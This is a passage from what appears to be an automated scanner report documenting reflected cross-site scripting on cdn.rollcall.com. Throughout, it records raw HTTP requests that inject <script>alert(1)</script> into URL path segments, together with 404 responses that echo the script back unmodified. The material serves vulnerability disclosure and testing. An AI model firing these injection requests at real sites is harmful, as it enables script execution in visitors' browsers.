Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:05 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n27), ms iad-agg-n27 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:35 GMT
Age: 0
Content-Length: 253
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL /csscc415<script>alert(1)</script>6fd79fd852e/landing.css was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a4f8d<script>alert(1)</script>7e60525730 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cssa4f8d<script>alert(1)</script>7e60525730/navigation.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:13:57 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n29), ms iad-agg-n29 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:27 GMT
Age: 0
Content-Length: 255
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL /cssa4f8d<script>alert(1)</script>7e60525730/navigation.css was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 50c4e<script>alert(1)</script>1209bdff379 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /css50c4e<script>alert(1)</script>1209bdff379/reset.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:13:56 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n5), ms iad-agg-n5 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:26 GMT
Age: 0
Content-Length: 251
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title></head><body>
<h1>Not Found</h1>
<p>The requested URL /css50c4e<script>alert(1)</script>1209bdff379/reset.css was not found on this server.</p>
...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ec947<script>alert(1)</script>1823adaae09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /cssec947<script>alert(1)</script>1823adaae09/text.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found Date: Sun, 13 Feb 2011 01:13:57 GMT Server: PWS/1.7.1.2 X-Px: ms iad-agg-n22 ( iad-agg-n5), ms iad-agg-n5 ( origin) P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml" Cache-Control: max-age=30 Expires: Sun, 13 Feb 2011 01:14:27 GMT Age: 0 Content-Length: 250 Content-Type: text/html; charset=ISO-8859-1 Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /cssec947<script>alert(1)</script>1823adaae09/text.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bea0d<script>alert(1)</script>20b7081cb50 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediabea0d<script>alert(1)</script>20b7081cb50/js/fancybox/jquery.fancybox-1.3.1.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:07 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n19), ms iad-agg-n19 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:38 GMT
Age: 0
Content-Length: 281
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediabea0d<script>alert(1)</script>20b7081cb50/js/fancybox/jquery.fancybox-1.3.1.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 32500<script>alert(1)</script>a4fbb7611b3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js32500<script>alert(1)</script>a4fbb7611b3/fancybox/jquery.fancybox-1.3.1.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:08 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n27), ms iad-agg-n27 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:38 GMT
Age: 0
Content-Length: 281
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js32500<script>alert(1)</script>a4fbb7611b3/fancybox/jquery.fancybox-1.3.1.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4b21f<script>alert(1)</script>eed81341fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js/fancybox4b21f<script>alert(1)</script>eed81341fd/jquery.fancybox-1.3.1.css HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:09 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:39 GMT
Age: 0
Content-Length: 280
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js/fancybox4b21f<script>alert(1)</script>eed81341fd/jquery.fancybox-1.3.1.css was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d6f8b<script>alert(1)</script>ed288a5d874 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediad6f8b<script>alert(1)</script>ed288a5d874/js/fancybox/jquery.fancybox-1.3.1.pack.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:02 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n5), ms iad-agg-n5 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:32 GMT
Age: 0
Content-Length: 285
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediad6f8b<script>alert(1)</script>ed288a5d874/js/fancybox/jquery.fancybox-1.3.1.pack.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8c76e<script>alert(1)</script>5019abba255 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js8c76e<script>alert(1)</script>5019abba255/fancybox/jquery.fancybox-1.3.1.pack.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:02 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n35), ms iad-agg-n35 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:32 GMT
Age: 0
Content-Length: 285
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js8c76e<script>alert(1)</script>5019abba255/fancybox/jquery.fancybox-1.3.1.pack.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d73ce<script>alert(1)</script>943ffe45da8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js/fancyboxd73ce<script>alert(1)</script>943ffe45da8/jquery.fancybox-1.3.1.pack.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:02 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n29), ms iad-agg-n29 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:32 GMT
Age: 0
Content-Length: 285
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js/fancyboxd73ce<script>alert(1)</script>943ffe45da8/jquery.fancybox-1.3.1.pack.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73caa<script>alert(1)</script>8588be73cf8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media73caa<script>alert(1)</script>8588be73cf8/js/jquery.cookie.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3; __unam=b7417e3-12e1c93d720-72f506aa-1; __utmz=26361150.1297559579.1.1.utmcsr=drudgereport.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=26361150.455314897.1297559579.1297559579.1297559579.1; __utmc=26361150; __utmb=26361150.1.10.1297559579
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:20 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:51 GMT
Age: 0
Content-Length: 263
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media73caa<script>alert(1)</script>8588be73cf8/js/jquery.cookie.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 18198<script>alert(1)</script>41b32485a74 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js18198<script>alert(1)</script>41b32485a74/jquery.cookie.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3; __unam=b7417e3-12e1c93d720-72f506aa-1; __utmz=26361150.1297559579.1.1.utmcsr=drudgereport.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=26361150.455314897.1297559579.1297559579.1297559579.1; __utmc=26361150; __utmb=26361150.1.10.1297559579
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:22 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n19), ms iad-agg-n19 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:52 GMT
Age: 0
Content-Length: 263
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js18198<script>alert(1)</script>41b32485a74/jquery.cookie.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a3044<script>alert(1)</script>e52125a6f33 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediaa3044<script>alert(1)</script>e52125a6f33/js/jquery.functions.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:13:59 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n29), ms iad-agg-n29 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:29 GMT
Age: 0
Content-Length: 266
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediaa3044<script>alert(1)</script>e52125a6f33/js/jquery.functions.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eb758<script>alert(1)</script>138f6eb7a46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/jseb758<script>alert(1)</script>138f6eb7a46/jquery.functions.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:13:59 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n31), ms iad-agg-n31 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:29 GMT
Age: 0
Content-Length: 266
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/jseb758<script>alert(1)</script>138f6eb7a46/jquery.functions.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aaa0c<script>alert(1)</script>c1980990cae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediaaaa0c<script>alert(1)</script>c1980990cae/js/jquery.hoverIntent.min.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:09 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n35), ms iad-agg-n35 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:39 GMT
Age: 0
Content-Length: 272
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediaaaa0c<script>alert(1)</script>c1980990cae/js/jquery.hoverIntent.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b0eb<script>alert(1)</script>cd17b8e170c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js3b0eb<script>alert(1)</script>cd17b8e170c/jquery.hoverIntent.min.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:09 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n13), ms iad-agg-n13 ( origin)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:39 GMT
Age: 0
Content-Length: 272
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /media/js3b0eb<script>alert(1)</script>cd17b8e170c/jquery.hoverIntent.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d5672<script>alert(1)</script>f0971fc05a7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mediad5672<script>alert(1)</script>f0971fc05a7/js/jquery.jtweetsanywhere-1.1.0.min.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ecjmlujo8iniv4b8dcvl4mm7a3
Response
HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 01:14:06 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n22 ( iad-agg-n34), ms iad-agg-n34 ( origin>CONN)
P3P: CP="CAO DSP NID CURa ADMa DEVa TAIi CONi OUR DELi SAMi IND PHY ONL UNI PUR COM NAV DEM STA", policyref="/w3c/p3p.xml"
Cache-Control: max-age=30
Expires: Sun, 13 Feb 2011 01:14:36 GMT
Age: 0
Content-Length: 282
Content-Type: text/html; charset=ISO-8859-1
Connection: keep-alive
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL /mediad5672<script>alert(1)</script>f0971fc05a7/js/jquery.jtweetsanywhere-1.1.0.min.js was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8da94<script>alert(1)</script>7219a2606ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /media/js8da94<script>alert(1)</script>7219a2606ef/jquery.jtweetsanywhere-1.1.0.min.js HTTP/1.1
Host: cdn.rollcall.com
Proxy-Connection: keep-alive
Referer: http://www.rollcall.com/news/-203351-1.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
